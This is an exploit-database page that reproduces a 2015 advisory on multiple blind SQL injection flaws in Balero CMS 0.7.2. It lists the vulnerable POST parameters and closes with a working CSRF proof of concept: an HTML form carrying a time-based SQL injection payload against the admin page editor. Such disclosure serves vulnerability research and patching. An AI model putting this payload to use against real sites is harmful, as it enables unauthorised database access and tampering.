header-logo
Suggest Exploit
vendor:
Balero CMS
by:
Gjoko 'LiquidWorm' Krstic
7.5
CVSS
HIGH
Multiple Blind SQL Injection
89
CWE
Product Name: Balero CMS
Affected Version From: 2000.7.2
Affected Version To: 2000.7.2
Patch Exists: NO
Related CWE: N/A
CPE: a:balerocms_software:balero_cms:0.7.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache 2.4.10 (Win32), PHP 5.6.3, MySQL 5.6.21
2015

Balero CMS v0.7.2 Multiple Blind SQL Injection Vulnerabilities

The application suffers from multiple blind SQL injection vulnerabilities when input is passed to several POST parameters thru their affected modules which are not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Mitigation:

Input validation and sanitization should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:


Balero CMS v0.7.2 Multiple Blind SQL Injection Vulnerabilities

Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2

Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.

Desc: The application suffers from multiple blind SQL injection vulnerabilities
when input is passed to several POST parameters thru their affected modules
which are not properly sanitised before being returned to the user or used
in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

Vulnerable POST parameters in affected modules:
-----------------------------------------------
- pages         [admin]
- themes        [admin]
- code          [mod-languages]
- id            [mod-blog, mod-virtual_page]
- title         [mod-blog]
- a             [mod-virtual_page]
- virtual_title [mod-virtual_page]
-----------------------------------------------

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5238
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5238.php


04.03.2015

--


csrf+bsqli poc:

<html>
  <body>
    <form action="http://localhost/balerocms/admin/edit_page/mod-virtual_page/id-11" method="POST">
      <input type="hidden" name="virtual_title" value="ZSL" />
      <input type="hidden" name="a" value="1" />
      <input type="hidden" name="content" value="Testingus" />
      <input type="hidden" name="_wysihtml5_mode" value="1" />
      <input type="hidden" name="id" value="11' and benchmark (50000000,sha1(1))-- " />
      <input type="hidden" name="submit_delete" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR